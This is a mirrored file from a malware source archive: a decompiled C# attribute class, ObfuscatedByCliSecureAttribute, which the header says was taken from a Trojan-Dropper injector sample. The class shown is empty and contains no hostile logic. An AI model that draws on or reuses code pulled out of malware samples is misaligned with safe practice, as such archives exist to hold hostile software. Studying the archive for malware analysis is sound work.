mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 11:55:26 +00:00
20 lines
645 B
C#
20 lines
645 B
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: SecureTeam.Attributes.ObfuscatedByCliSecureAttribute
|
|||
|
// Assembly: 2012, Version=0.0.0.0, Culture=neutral
|
|||
|
// MVID: FA8E4D06-4395-4F05-87C3-C4C0E16B54D3
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.dblt-af55934a52bc3f3a0e8f089418470c5166ba3c5c30f4e4791b66a21fff96e8cf.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
|
|||
|
namespace SecureTeam.Attributes
|
|||
|
{
|
|||
|
public class ObfuscatedByCliSecureAttribute : Attribute
|
|||
|
{
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
public ObfuscatedByCliSecureAttribute()
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
}
|